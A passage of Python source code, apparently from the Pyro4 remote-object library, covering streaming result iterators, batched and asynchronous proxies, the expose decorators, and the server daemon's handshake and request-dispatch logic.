Annotations are passed in because some blob metadata is added. They're not part of the blob itself.
"""
if len(vargs) > 1 or kwargs:
raise errors.SerializeError("if SerializedBlob is used, it must be the only argument")
blob = vargs[0]
flags |= message.FLAGS_KEEPSERIALIZED
# Pass the objectId and methodname separately in an annotation because currently,
# they are embedded inside the serialized message data. And we're not deserializing that,
# so we have to have another means of knowing the object and method it is meant for...
# A better solution is perhaps to split the actual remote method arguments from the
# control data (object + methodname) but that requires a major protocol change.
# The code below is not as nice but it works without any protocol change and doesn't
# require a hack either - so it's actually not bad like this.
import marshal
annotations["BLBI"] = marshal.dumps((blob.info, objectId, methodname))
if blob._contains_blob:
# directly pass through the already serialized msg data from within the blob
protocol_msg = blob._data
data, compressed = protocol_msg.data, protocol_msg.flags & message.FLAGS_COMPRESSED
else:
# replaces SerializedBlob argument with the data to be serialized
data, compressed = serializer.serializeCall(objectId, methodname, blob._data, kwargs, compress=config.COMPRESSION)
return data, compressed, flags
class _StreamResultIterator(object):
"""
Pyro returns this as a result of a remote call which returns an iterator or generator.
It is a normal iterable and produces elements on demand from the remote iterator.
You can simply use it in for loops, list comprehensions etc.
"""
def __init__(self, streamId, proxy):
self.streamId = streamId
self.proxy = proxy
self.pyroseq = proxy._pyroSeq
def __iter__(self):
return self
def next(self):
# python 2.x support
return self.__next__()
def __next__(self):
if self.proxy is None:
raise StopIteration
if self.proxy._pyroConnection is None:
raise errors.ConnectionClosedError("the proxy for this stream result has been closed")
self.pyroseq += 1
try:
return self.proxy._pyroInvoke("get_next_stream_item", [self.streamId], {}, objectId=constants.DAEMON_NAME)
except (StopIteration, GeneratorExit):
# when the iterator is exhausted, the proxy is removed to avoid unneeded close_stream calls later
# (the server has closed its part of the stream by itself already)
self.proxy = None
raise
def __del__(self):
self.close()
def close(self):
if self.proxy and self.proxy._pyroConnection is not None:
if self.pyroseq == self.proxy._pyroSeq:
# we're still in sync, it's okay to use the same proxy to close this stream
self.proxy._pyroInvoke("close_stream", [self.streamId], {},
flags=message.FLAGS_ONEWAY, objectId=constants.DAEMON_NAME)
else:
# The proxy's sequence number has diverged.
# One of the reasons this can happen is because this call is being done from python's GC where
# it decides to gc old iterator objects *during a new call on the proxy*.
# If we use the same proxy and do a call in between, the other call on the proxy will get an out of sync seq and crash!
# We create a temporary second proxy to call close_stream on. This is inefficient, but avoids the problem.
try:
with self.proxy.__copy__() as closingProxy:
closingProxy._pyroInvoke("close_stream", [self.streamId], {},
flags=message.FLAGS_ONEWAY, objectId=constants.DAEMON_NAME)
except errors.CommunicationError:
pass
self.proxy = None
class _BatchedRemoteMethod(object):
"""method call abstraction that is used with batched calls"""
def __init__(self, calls, name):
self.__calls = calls
self.__name = name
def __getattr__(self, name):
return _BatchedRemoteMethod(self.__calls, "%s.%s" % (self.__name, name))
def __call__(self, *args, **kwargs):
self.__calls.append((self.__name, args, kwargs))
class _BatchProxyAdapter(object):
"""Helper class that lets you batch multiple method calls into one.
It is constructed with a reference to the normal proxy that will
carry out the batched calls. Call methods on this object that you want to batch,
and finally call the batch proxy itself. That call will return a generator
for the results of every method call in the batch (in sequence)."""
def __init__(self, proxy):
self.__proxy = proxy
self.__calls = []
def __getattr__(self, name):
return _BatchedRemoteMethod(self.__calls, name)
def __enter__(self):
return self
def __exit__(self, *args):
pass
def __copy__(self):
copy = type(self)(self.__proxy)
copy.__calls = list(self.__calls)
return copy
def __resultsgenerator(self, results):
for result in results:
if isinstance(result, futures._ExceptionWrapper):
result.raiseIt() # re-raise the remote exception locally.
else:
yield result # it is a regular result object, yield that and continue.
def __call__(self, oneway=False, asynchronous=False):
if oneway and asynchronous:
raise errors.PyroError("async oneway calls make no sense")
if asynchronous:
return _AsyncRemoteMethod(self, "<asyncbatch>", self.__proxy._pyroMaxRetries)()
else:
results = self.__proxy._pyroInvokeBatch(self.__calls, oneway)
self.__calls = [] # clear for re-use
if not oneway:
return self.__resultsgenerator(results)
if sys.version_info < (3, 7):
# async keyword backwards compatibility
call_37 = __call__
def __call__(self, oneway=False, **kwargs):
if kwargs:
kword = list(kwargs.keys())
if kword != ["async"] and kword != ["asynchronous"]:
raise TypeError("__call__() got an unexpected keyword argument '{:s}'".format(kword[0]))
if kword == ["async"]:
kwargs = {"asynchronous": kwargs["async"]}
kwargs["oneway"] = oneway
return _BatchProxyAdapter.call_37(self, **kwargs)
def _pyroInvoke(self, name, args, kwargs):
# ignore all parameters, we just need to execute the batch
results = self.__proxy._pyroInvokeBatch(self.__calls)
self.__calls = [] # clear for re-use
return self.__resultsgenerator(results)
class _AsyncRemoteMethod(object):
"""asynchronous method call abstraction (call will run in a background thread)"""
def __init__(self, proxy, name, max_retries):
self.__proxy = proxy
self.__name = name
self.__max_retries = max_retries
def __getattr__(self, name):
return _AsyncRemoteMethod(self.__proxy, "%s.%s" % (self.__name, name), self.__max_retries)
def __call__(self, *args, **kwargs):
result = futures.FutureResult()
thread = threading.Thread(target=self.__asynccall, args=(result, args, kwargs))
thread.setDaemon(True)
thread.start()
return result
def __asynccall(self, asyncresult, args, kwargs):
for attempt in range(self.__max_retries + 1):
try:
# use a copy of the proxy otherwise calls would still be done in sequence,
# and use contextmanager to close the proxy after we're done
with self.__proxy.__copy__() as proxy:
delay = 0.1 + random.random() / 5
while not proxy._pyroConnection:
try:
proxy._pyroBind()
except errors.CommunicationError as x:
if "no free workers" not in str(x):
raise
time.sleep(delay) # wait a bit until a worker might be available again
delay += 0.4 + random.random() / 2
if 0 < config.COMMTIMEOUT / 2 < delay:
raise
value = proxy._pyroInvoke(self.__name, args, kwargs)
asyncresult.value = value
return
except (errors.ConnectionClosedError, errors.TimeoutError) as x:
# only retry for recoverable network errors
if attempt >= self.__max_retries:
# ignore any exceptions here, return them as part of the asynchronous result instead
asyncresult.value = futures._ExceptionWrapper(x)
return
except Exception as x:
# ignore any exceptions here, return them as part of the asynchronous result instead
asyncresult.value = futures._ExceptionWrapper(x)
return
def batch(proxy):
"""convenience method to get a batch proxy adapter"""
return proxy._pyroBatch()
def asyncproxy(proxy, asynchronous=True):
"""convenience method to set proxy to asynchronous or sync mode."""
proxy._pyroAsync(asynchronous)
def pyroObjectToAutoProxy(obj):
"""reduce function that automatically replaces Pyro objects by a Proxy"""
if config.AUTOPROXY:
daemon = getattr(obj, "_pyroDaemon", None)
if daemon:
# only return a proxy if the object is a registered pyro object
return daemon.proxyFor(obj)
return obj
# decorators
def callback(method):
"""
decorator to mark a method to be a 'callback'. This will make Pyro
raise any errors also on the callback side, and not only on the side
that does the callback call.
"""
method._pyroCallback = True
return method
def oneway(method):
"""
decorator to mark a method to be oneway (client won't wait for a response)
"""
method._pyroOneway = True
return method
def expose(method_or_class):
"""
Decorator to mark a method or class to be exposed for remote calls (relevant when REQUIRE_EXPOSE=True)
You can apply it to a method or a class as a whole.
If you need to change the default instance mode or instance creator, also use a @behavior decorator.
"""
if inspect.isdatadescriptor(method_or_class):
func = method_or_class.fget or method_or_class.fset or method_or_class.fdel
if util.is_private_attribute(func.__name__):
raise AttributeError("exposing private names (starting with _) is not allowed")
func._pyroExposed = True
return method_or_class
attrname = getattr(method_or_class, "__name__", None)
if not attrname:
# we could be dealing with a descriptor (classmethod/staticmethod), this means the order of the decorators is wrong
if inspect.ismethoddescriptor(method_or_class):
attrname = method_or_class.__get__(None, dict).__name__
raise AttributeError("using @expose on a classmethod/staticmethod must be done "
"after @classmethod/@staticmethod. Method: " + attrname)
else:
raise AttributeError("@expose cannot determine what this is: " + repr(method_or_class))
if util.is_private_attribute(attrname):
raise AttributeError("exposing private names (starting with _) is not allowed")
if inspect.isclass(method_or_class):
clazz = method_or_class
log.debug("exposing all members of %r", clazz)
for name in clazz.__dict__:
if util.is_private_attribute(name):
continue
thing = getattr(clazz, name)
if inspect.isfunction(thing) or inspect.ismethoddescriptor(thing):
thing._pyroExposed = True
elif inspect.ismethod(thing):
thing.__func__._pyroExposed = True
elif inspect.isdatadescriptor(thing):
if getattr(thing, "fset", None):
thing.fset._pyroExposed = True
if getattr(thing, "fget", None):
thing.fget._pyroExposed = True
if getattr(thing, "fdel", None):
thing.fdel._pyroExposed = True
clazz._pyroExposed = True
return clazz
method_or_class._pyroExposed = True
return method_or_class
def behavior(instance_mode="session", instance_creator=None):
"""
Decorator to specify the server behavior of your Pyro class.
"""
def _behavior(clazz):
if not inspect.isclass(clazz):
raise TypeError("behavior decorator can only be used on a class")
if instance_mode not in ("single", "session", "percall"):
raise ValueError("invalid instance mode: " + instance_mode)
if instance_creator and not callable(instance_creator):
raise TypeError("instance_creator must be a callable")
clazz._pyroInstancing = (instance_mode, instance_creator)
return clazz
if not isinstance(instance_mode, basestring):
raise SyntaxError("behavior decorator is missing argument(s)")
return _behavior
@expose
class DaemonObject(object):
"""The part of the daemon that is exposed as a Pyro object."""
def __init__(self, daemon):
self.daemon = daemon
def registered(self):
"""returns a list of all object names registered in this daemon"""
return list(self.daemon.objectsById.keys())
def ping(self):
"""a simple do-nothing method for testing purposes"""
pass
def info(self):
"""return some descriptive information about the daemon"""
return "%s bound on %s, NAT %s, %d objects registered. Servertype: %s" % (
constants.DAEMON_NAME, self.daemon.locationStr, self.daemon.natLocationStr,
len(self.daemon.objectsById), self.daemon.transportServer)
def get_metadata(self, objectId, as_lists=False):
"""
Get metadata for the given object (exposed methods, oneways, attributes).
If you get an error in your proxy saying that 'DaemonObject' has no attribute 'get_metadata',
you're probably connecting to an older Pyro version (4.26 or earlier).
Either upgrade the Pyro version or set METADATA config item to False in your client code.
"""
obj = self.daemon.objectsById.get(objectId)
if obj is not None:
metadata = util.get_exposed_members(obj, only_exposed=config.REQUIRE_EXPOSE, as_lists=as_lists)
if config.REQUIRE_EXPOSE and not metadata["methods"] and not metadata["attrs"]:
# Something seems wrong: nothing is remotely exposed.
# Possibly because older code not using @expose is now running with a more recent Pyro version
# where @expose is mandatory in the default configuration. Give a hint to the user.
if not inspect.isclass(obj):
obj = type(obj)
warnings.warn("Class %r doesn't expose any methods or attributes. Did you forget setting @expose on them?" % obj)
return metadata
else:
log.debug("unknown object requested: %s", objectId)
raise errors.DaemonError("unknown object")
def get_next_stream_item(self, streamId):
if streamId not in self.daemon.streaming_responses:
raise errors.PyroError("item stream terminated")
client, timestamp, linger_timestamp, stream = self.daemon.streaming_responses[streamId]
if client is None:
# reset client connection association (can be None if proxy disconnected)
self.daemon.streaming_responses[streamId] = (current_context.client, timestamp, 0, stream)
try:
return next(stream)
except Exception:
# in case of error (or StopIteration!) the stream is removed
del self.daemon.streaming_responses[streamId]
raise
def close_stream(self, streamId):
if streamId in self.daemon.streaming_responses:
del self.daemon.streaming_responses[streamId]
class Daemon(object):
"""
Pyro daemon. Contains server side logic and dispatches incoming remote method calls
to the appropriate objects.
"""
def __init__(self, host=None, port=0, unixsocket=None, nathost=None, natport=None, interface=DaemonObject, connected_socket=None):
if connected_socket:
nathost = natport = None
else:
if host is None:
host = config.HOST
if nathost is None:
nathost = config.NATHOST
if natport is None and nathost is not None:
natport = config.NATPORT
if nathost and unixsocket:
raise ValueError("cannot use nathost together with unixsocket")
if (nathost is None) ^ (natport is None):
raise ValueError("must provide natport with nathost")
self.__mustshutdown = threading.Event()
self.__mustshutdown.set()
self.__loopstopped = threading.Event()
self.__loopstopped.set()
if connected_socket:
from Pyro4.socketserver.existingconnectionserver import SocketServer_ExistingConnection
self.transportServer = SocketServer_ExistingConnection()
self.transportServer.init(self, connected_socket)
else:
if config.SERVERTYPE == "thread":
from Pyro4.socketserver.threadpoolserver import SocketServer_Threadpool
self.transportServer = SocketServer_Threadpool()
elif config.SERVERTYPE == "multiplex":
from Pyro4.socketserver.multiplexserver import SocketServer_Multiplex
self.transportServer = SocketServer_Multiplex()
else:
raise errors.PyroError("invalid server type '%s'" % config.SERVERTYPE)
self.transportServer.init(self, host, port, unixsocket)
#: The location (str of the form ``host:portnumber``) on which the Daemon is listening
self.locationStr = self.transportServer.locationStr
log.debug("daemon created on %s - %s (pid %d)", self.locationStr, socketutil.family_str(self.transportServer.sock), os.getpid())
natport_for_loc = natport
if natport == 0:
# expose internal port number as NAT port as well. (don't use port because it could be 0 and will be chosen by the OS)
natport_for_loc = int(self.locationStr.split(":")[1])
#: The NAT-location (str of the form ``nathost:natportnumber``) on which the Daemon is exposed for use with NAT-routing
self.natLocationStr = "%s:%d" % (nathost, natport_for_loc) if nathost else None
if self.natLocationStr:
log.debug("NAT address is %s", self.natLocationStr)
pyroObject = interface(self)
pyroObject._pyroId = constants.DAEMON_NAME
#: Dictionary from Pyro object id to the actual Pyro object registered by this id
self.objectsById = {pyroObject._pyroId: pyroObject}
# assert that the configured serializers are available, and remember their ids:
self.__serializer_ids = {util.get_serializer(ser_name).serializer_id for ser_name in config.SERIALIZERS_ACCEPTED}
log.debug("accepted serializers: %s" % config.SERIALIZERS_ACCEPTED)
log.debug("pyro protocol version: %d pickle version: %d" % (constants.PROTOCOL_VERSION, config.PICKLE_PROTOCOL_VERSION))
self.__pyroHmacKey = None
self._pyroInstances = {} # pyro objects for instance_mode=single (singletons, just one per daemon)
self.streaming_responses = {} # stream_id -> (client, creation_timestamp, linger_timestamp, stream)
self.housekeeper_lock = threading.Lock()
self.create_single_instance_lock = threading.Lock()
self.__mustshutdown.clear()
@property
def _pyroHmacKey(self):
return self.__pyroHmacKey
@_pyroHmacKey.setter
def _pyroHmacKey(self, value):
# if needed, convert the hmac value to bytes first
if value and sys.version_info >= (3, 0) and type(value) is not bytes:
value = value.encode("utf-8") # convert to bytes
self.__pyroHmacKey = value
@property
def sock(self):
"""the server socket used by the daemon"""
return self.transportServer.sock
@property
def sockets(self):
"""list of all sockets used by the daemon (server socket and all active client sockets)"""
return self.transportServer.sockets
@property
def selector(self):
"""the multiplexing selector used, if using the multiplex server type"""
return self.transportServer.selector
@staticmethod
def serveSimple(objects, host=None, port=0, daemon=None, ns=True, verbose=True):
"""
Basic method to fire up a daemon (or supply one yourself).
objects is a dict containing objects to register as keys, and
their names (or None) as values. If ns is true they will be registered
in the naming server as well, otherwise they just stay local.
If you need to publish on a unix domain socket you can't use this shortcut method.
See the documentation on 'publishing objects' (in chapter: Servers) for more details.
"""
if daemon is None:
daemon = Daemon(host, port)
with daemon:
if ns:
ns = _locateNS()
for obj, name in objects.items():
if ns:
localname = None # name is used for the name server
else:
localname = name # no name server, use name in daemon
uri = daemon.register(obj, localname)
if verbose:
print("Object {0}:\n uri = {1}".format(repr(obj), uri))
if name and ns:
ns.register(name, uri)
if verbose:
print(" name = {0}".format(name))
if verbose:
print("Pyro daemon running.")
daemon.requestLoop()
def requestLoop(self, loopCondition=lambda: True):
"""
Goes in a loop to service incoming requests, until someone breaks this
or calls shutdown from another thread.
"""
self.__mustshutdown.clear()
log.info("daemon %s entering requestloop", self.locationStr)
try:
self.__loopstopped.clear()
condition = lambda: not self.__mustshutdown.isSet() and loopCondition()
self.transportServer.loop(loopCondition=condition)
finally:
self.__loopstopped.set()
log.debug("daemon exits requestloop")
def events(self, eventsockets):
"""for use in an external event loop: handle any requests that are pending for this daemon"""
return self.transportServer.events(eventsockets)
def shutdown(self):
"""Cleanly terminate a daemon that is running in the requestloop."""
log.debug("daemon shutting down")
self.streaming_responses = {}
time.sleep(0.02)
self.__mustshutdown.set()
if self.transportServer:
self.transportServer.shutdown()
time.sleep(0.02)
self.close()
self.__loopstopped.wait(timeout=5) # use timeout to avoid deadlock situations
@property
def _shutting_down(self):
return self.__mustshutdown.is_set()
def _handshake(self, conn, denied_reason=None):
"""
Perform connection handshake with new clients.
Client sends a MSG_CONNECT message with a serialized data payload.
If all is well, return with a CONNECT_OK message.
The reason we're not doing this with a MSG_INVOKE method call on the daemon
(like when retrieving the metadata) is because we need to force the clients
to get past an initial connect handshake before letting them invoke any method.
Return True for successful handshake, False if something was wrong.
If a denied_reason is given, the handshake will fail with the given reason.
"""
serializer_id = util.MarshalSerializer.serializer_id
msg_seq = 0
try:
msg = message.Message.recv(conn, [message.MSG_CONNECT], hmac_key=self._pyroHmacKey)
msg_seq = msg.seq
if denied_reason:
raise Exception(denied_reason)
if config.LOGWIRE:
_log_wiredata(log, "daemon handshake received", msg)
if msg.serializer_id not in self.__serializer_ids:
raise errors.SerializeError("message used serializer that is not accepted: %d" % msg.serializer_id)
if "CORR" in msg.annotations:
current_context.correlation_id = uuid.UUID(bytes=msg.annotations["CORR"])
else:
current_context.correlation_id = uuid.uuid4()
serializer_id = msg.serializer_id
serializer = util.get_serializer_by_id(serializer_id)
data = serializer.deserializeData(msg.data, msg.flags & message.FLAGS_COMPRESSED)
handshake_response = self.validateHandshake(conn, data["handshake"])
if msg.flags & message.FLAGS_META_ON_CONNECT:
# Usually this flag will be enabled, which results in including the object metadata
# in the handshake response. This avoids a separate remote call to get_metadata.
flags = message.FLAGS_META_ON_CONNECT
handshake_response = {
"handshake": handshake_response,
"meta": self.objectsById[constants.DAEMON_NAME].get_metadata(data["object"], as_lists=True)
}
else:
flags = 0
data, compressed = serializer.serializeData(handshake_response, config.COMPRESSION)
msgtype = message.MSG_CONNECTOK
if compressed:
flags |= message.FLAGS_COMPRESSED
except errors.ConnectionClosedError:
log.debug("handshake failed, connection closed early")
return False
except Exception as x:
log.debug("handshake failed, reason:", exc_info=True)
serializer = util.get_serializer_by_id(serializer_id)
data, compressed = serializer.serializeData(str(x), False)
msgtype = message.MSG_CONNECTFAIL
flags = message.FLAGS_COMPRESSED if compressed else 0
# We need a minimal amount of response data or the socket will remain blocked
# on some systems... (messages smaller than 40 bytes)
msg = message.Message(msgtype, data, serializer_id, flags, msg_seq, annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon handshake response", msg)
conn.send(msg.to_bytes())
return msg.type == message.MSG_CONNECTOK
def validateHandshake(self, conn, data):
"""
Override this to create a connection validator for new client connections.
It should return a response data object normally if the connection is okay,
or should raise an exception if the connection should be denied.
"""
return "hello"
def clientDisconnect(self, conn):
"""
Override this to handle a client disconnect.
Conn is the SocketConnection object that was disconnected.
"""
pass
def handleRequest(self, conn):
"""
Handle incoming Pyro request. Catches any exception that may occur and
wraps it in a reply to the calling side, as to not make this server side loop
terminate due to exceptions caused by remote invocations.
"""
request_flags = 0
request_seq = 0
request_serializer_id = util.MarshalSerializer.serializer_id
wasBatched = False
isCallback = False
try:
msg = message.Message.recv(conn, [message.MSG_INVOKE, message.MSG_PING], hmac_key=self._pyroHmacKey)
except errors.CommunicationError as x:
# we couldn't even get data from the client, this is an immediate error
# log.info("error receiving data from client %s: %s", conn.sock.getpeername(), x)
raise x
try:
request_flags = msg.flags
request_seq = msg.seq
request_serializer_id = msg.serializer_id
current_context.correlation_id = uuid.UUID(bytes=msg.annotations["CORR"]) if "CORR" in msg.annotations else uuid.uuid4()
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata received", msg)
if msg.type == message.MSG_PING:
# return same seq, but ignore any data (it's a ping, not an echo). Nothing is deserialized.
msg = message.Message(message.MSG_PING, b"pong", msg.serializer_id, 0, msg.seq,
annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending", msg)
conn.send(msg.to_bytes())
return
if msg.serializer_id not in self.__serializer_ids:
raise errors.SerializeError("message used serializer that is not accepted: %d" % msg.serializer_id)
serializer = util.get_serializer_by_id(msg.serializer_id)
if request_flags & message.FLAGS_KEEPSERIALIZED:
# pass on the wire protocol message blob unchanged
objId, method, vargs, kwargs = self.__deserializeBlobArgs(msg)
else:
# normal deserialization of remote call arguments
objId, method, vargs, kwargs = serializer.deserializeCall(msg.data, compressed=msg.flags & message.FLAGS_COMPRESSED)
current_context.client = conn
try:
current_context.client_sock_addr = conn.sock.getpeername() # store, because on oneway calls, socket will be disconnected
except socket.error:
current_context.client_sock_addr = None # sometimes getpeername() doesn't work...
current_context.seq = msg.seq
current_context.annotations = msg.annotations
current_context.msg_flags = msg.flags
current_context.serializer_id = msg.serializer_id
del msg # invite GC to collect the object, don't wait for out-of-scope
obj = self.objectsById.get(objId)
if obj is not None:
if inspect.isclass(obj):
obj = self._getInstance(obj, conn)
if request_flags & message.FLAGS_BATCH:
# batched method calls, loop over them all and collect all results
data = []
for method, vargs, kwargs in vargs:
method = util.getAttribute(obj, method)
try:
result = method(*vargs, **kwargs) # this is the actual method call to the Pyro object
except Exception:
xt, xv = sys.exc_info()[0:2]
log.debug("Exception occurred while handling batched request: %s", xv)
xv._pyroTraceback = util.formatTraceback(detailed=config.DETAILED_TRACEBACK)
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(xv, True) # piggyback attributes
data.append(futures._ExceptionWrapper(xv))
break # stop processing the rest of the batch
else:
data.append(result) # note that we don't support streaming results in batch mode
wasBatched = True
else:
# normal single method call
if method == "__getattr__":
# special case for direct attribute access (only exposed @properties are accessible)
data = util.get_exposed_property_value(obj, vargs[0], only_exposed=config.REQUIRE_EXPOSE)
elif method == "__setattr__":
# special case for direct attribute access (only exposed @properties are accessible)
data = util.set_exposed_property_value(obj, vargs[0], vargs[1], only_exposed=config.REQUIRE_EXPOSE)
else:
method = util.getAttribute(obj, method)
if request_flags & message.FLAGS_ONEWAY and config.ONEWAY_THREADED:
# oneway call to be run inside its own thread
_OnewayCallThread(target=method, args=vargs, kwargs=kwargs).start()
else:
isCallback = getattr(method, "_pyroCallback", False)
data = method(*vargs, **kwargs) # this is the actual method call to the Pyro object
if not request_flags & message.FLAGS_ONEWAY:
isStream, data = self._streamResponse(data, conn)
if isStream:
# throw an exception as well as setting message flags
# this way, it is backwards compatible with older pyro versions.
exc = errors.ProtocolError("result of call is an iterator")
ann = {"STRM": data.encode()} if data else {}
self._sendExceptionResponse(conn, request_seq, serializer.serializer_id, exc, None,
annotations=ann, flags=message.FLAGS_ITEMSTREAMRESULT)
return
else:
log.debug("unknown object requested: %s", objId)
raise errors.DaemonError("unknown object")
if request_flags & message.FLAGS_ONEWAY:
return # oneway call, don't send a response
else:
data, compressed = serializer.serializeData(data, compress=config.COMPRESSION)
response_flags = 0
if compressed:
response_flags |= message.FLAGS_COMPRESSED
if wasBatched:
response_flags |= message.FLAGS_BATCH
msg = message.Message(message.MSG_RESULT, data, serializer.serializer_id, response_flags, request_seq,
annotations=self.__annotations(), hmac_key=self._pyroHmacKey)
current_context.response_annotations = {}
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending", msg)
conn.send(msg.to_bytes())
except Exception:
xt, xv = sys.exc_info()[0:2]
msg = getattr(xv, "pyroMsg", None)
if msg:
request_seq = msg.seq
request_serializer_id = msg.serializer_id
if xt is not errors.ConnectionClosedError:
if xt not in (StopIteration, GeneratorExit):
log.debug("Exception occurred while handling request: %r", xv)
if not request_flags & message.FLAGS_ONEWAY:
if isinstance(xv, errors.SerializeError) or not isinstance(xv, errors.CommunicationError):
# only return the error to the client if it wasn't a oneway call, and not a communication error
# (in these cases, it makes no sense to try to report the error back to the client...)
tblines = util.formatTraceback(detailed=config.DETAILED_TRACEBACK)
self._sendExceptionResponse(conn, request_seq, request_serializer_id, xv, tblines)
if isCallback or isinstance(xv, (errors.CommunicationError, errors.SecurityError)):
raise # re-raise if flagged as callback, communication or security error.
def _clientDisconnect(self, conn):
if config.ITER_STREAM_LINGER > 0:
# client goes away, keep streams around for a bit longer (allow reconnect)
for streamId in list(self.streaming_responses):
info = self.streaming_responses.get(streamId, None)
if info and info[0] is conn:
_, timestamp, _, stream = info
self.streaming_responses[streamId] = (None, timestamp, time.time(), stream)
else:
# client goes away, close any streams it had open as well
for streamId in list(self.streaming_responses):
info = self.streaming_responses.get(streamId, None)
if info and info[0] is conn:
del self.streaming_responses[streamId]
self.clientDisconnect(conn) # user overridable hook
def _housekeeping(self):
"""
Perform periodical housekeeping actions (cleanups etc)
"""
if self._shutting_down:
return
with self.housekeeper_lock:
if self.streaming_responses:
if config.ITER_STREAM_LIFETIME > 0:
# cleanup iter streams that are past their lifetime
for streamId in list(self.streaming_responses.keys()):
info = self.streaming_responses.get(streamId, None)
if info:
last_use_period = time.time() - info[1]
if 0 < config.ITER_STREAM_LIFETIME < last_use_period:
del self.streaming_responses[streamId]
if config.ITER_STREAM_LINGER > 0:
# cleanup iter streams that are past their linger time
for streamId in list(self.streaming_responses.keys()):
info = self.streaming_responses.get(streamId, None)
if info and info[2]:
linger_period = time.time() - info[2]
if linger_period > config.ITER_STREAM_LINGER:
del self.streaming_responses[streamId]
self.housekeeping()
def housekeeping(self):
"""
Override this to add custom periodic housekeeping (cleanup) logic.
This will be called every few seconds by the running daemon's request loop.
"""
pass
def _getInstance(self, clazz, conn):
"""
Find or create a new instance of the class
"""
def createInstance(clazz, creator):
try:
if creator:
obj = creator(clazz)
if isinstance(obj, clazz):
return obj
raise TypeError("instance creator returned object of different type")
return clazz()
except Exception:
log.exception("could not create pyro object instance")
raise
instance_mode, instance_creator = clazz._pyroInstancing
if instance_mode == "single":
# create and use one singleton instance of this class (not a global singleton, just exactly one per daemon)
with self.create_single_instance_lock:
instance = self._pyroInstances.get(clazz)
if not instance:
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
instance = createInstance(clazz, instance_creator)
self._pyroInstances[clazz] = instance
return instance
elif instance_mode == "session":
# Create and use one instance for this proxy connection
# the instances are kept on the connection object.
# (this is the default instance mode when using new style @expose)
instance = conn.pyroInstances.get(clazz)
if not instance:
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
instance = createInstance(clazz, instance_creator)
conn.pyroInstances[clazz] = instance
return instance
elif instance_mode == "percall":
# create and use a new instance just for this call
log.debug("instancemode %s: creating new pyro object for %s", instance_mode, clazz)
return createInstance(clazz, instance_creator)
else:
raise errors.DaemonError("invalid instancemode in registered class")
def _sendExceptionResponse(self, connection, seq, serializer_id, exc_value, tbinfo, flags=0, annotations=None):
"""send an exception back including the local traceback info"""
exc_value._pyroTraceback = tbinfo
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(exc_value, True) # piggyback attributes
serializer = util.get_serializer_by_id(serializer_id)
try:
data, compressed = serializer.serializeData(exc_value)
except:
# the exception object couldn't be serialized, use a generic PyroError instead
xt, xv, tb = sys.exc_info()
msg = "Error serializing exception: %s. Original exception: %s: %s" % (str(xv), type(exc_value), str(exc_value))
exc_value = errors.PyroError(msg)
exc_value._pyroTraceback = tbinfo
if sys.platform == "cli":
util.fixIronPythonExceptionForPickle(exc_value, True) # piggyback attributes
data, compressed = serializer.serializeData(exc_value)
flags |= message.FLAGS_EXCEPTION
if compressed:
flags |= message.FLAGS_COMPRESSED
annotations = dict(annotations or {})
annotations.update(self.annotations())
msg = message.Message(message.MSG_RESULT, data, serializer.serializer_id, flags, seq,
annotations=annotations, hmac_key=self._pyroHmacKey)
if config.LOGWIRE:
_log_wiredata(log, "daemon wiredata sending (error response)", msg)
connection.send(msg.to_bytes())
def register(self, obj_or_class, objectId=None, force=False):
"""
Register a Pyro object under the given id. Note that this object is now only
known inside this daemon, it is not automatically available in a name server.
This method returns a URI for the registered object.
Pyro checks if an object is already registered, unless you set force=True.
You can register a class or an object (instance) directly.
For a class, Pyro will create instances of it to handle the remote calls according
to the instance_mode (set via @expose on the class). The default there is one object
per session (=proxy connection). If you register an object directly, Pyro will use
that single object for *all* remote calls.
"""
if objectId:
if not isinstance(objectId, basestring):
raise TypeError("objectId must be a string or None")
else:
objectId = "obj_" + uuid.uuid4().hex # generate a new objectId
if inspect.isclass(obj_or_class):
if not hasattr(obj_or_class, "_pyroInstancing"):
obj_or_class._pyroInstancing = ("session", None)
if not force:
if hasattr(obj_or_class, "_pyroId") and obj_or_class._pyroId != "": # check for empty string is needed for Cython
raise errors.DaemonError("object or class already has a Pyro id")
if objectId in self.objectsById:
raise errors.DaemonError("an object or class is already registered with that id")
# set some pyro attributes
obj_or_class._pyroId = objectId
obj_or_class._pyroDaemon = self
if config.AUTOPROXY:
# register a custom serializer for the type to automatically return proxies
# we need to do this for all known serializers
for ser in util._serializers.values():
if inspect.isclass(obj_or_class):
ser.register_type_replacement(obj_or_class, pyroObjectToAutoProxy)
else:
ser.register_type_replacement(type(obj_or_class), pyroObjectToAutoProxy)
# register the object/class in the mapping
self.objectsById[obj_or_class._pyroId] = obj_or_class
return self.uriFor(objectId)
def unregister(self, objectOrId):
"""
Remove a class or object from the known objects inside this daemon.
You can unregister the class/object directly, or with its id.
"""
if objectOrId is None:
raise ValueError("object or objectid argument expected")
if not isinstance(objectOrId, basestring):
objectId = getattr(objectOrId, "_pyroId", None)
if objectId is None:
raise errors.DaemonError("object isn't registered")
else:
objectId = objectOrId
objectOrId = None
if objectId == constants.DAEMON_NAME:
return
if objectId in self.objectsById:
del self.objectsById[objectId]
if objectOrId is not None:
del objectOrId._pyroId
del objectOrId._pyroDaemon
# Don't remove the custom type serializer because there may be
# other registered objects of the same type still depending on it.
def uriFor(self, objectOrId, nat=True):
"""
Get a URI for the given object (or object id) from this daemon.
Only a daemon can hand out proper uris because the access location is
contained in them.
Note that unregistered objects cannot be given an uri, but unregistered
object names can (it's just a string we're creating in that case).
If nat is set to False, the configured NAT address (if any) is ignored and it will
return an URI for the internal address.
"""
if not isinstance(objectOrId, basestring):
objectOrId = getattr(objectOrId, "_pyroId", None)
if objectOrId is None or objectOrId not in self.objectsById:
raise errors.DaemonError("object isn't registered in this daemon")
if nat:
loc = self.natLocationStr or self.locationStr
else:
loc = self.locationStr
return URI("PYRO:%s@%s" % (objectOrId, loc))
def resetMetadataCache(self, objectOrId, nat=True):
"""Reset cache of metadata when a Daemon has available methods/attributes
dynamically updated. Clients will have to get a new proxy to see changes"""
uri = self.uriFor(objectOrId, nat)
# can only be cached if registered, else no-op
if uri.object in self.objectsById:
registered_object = self.objectsById[uri.object]
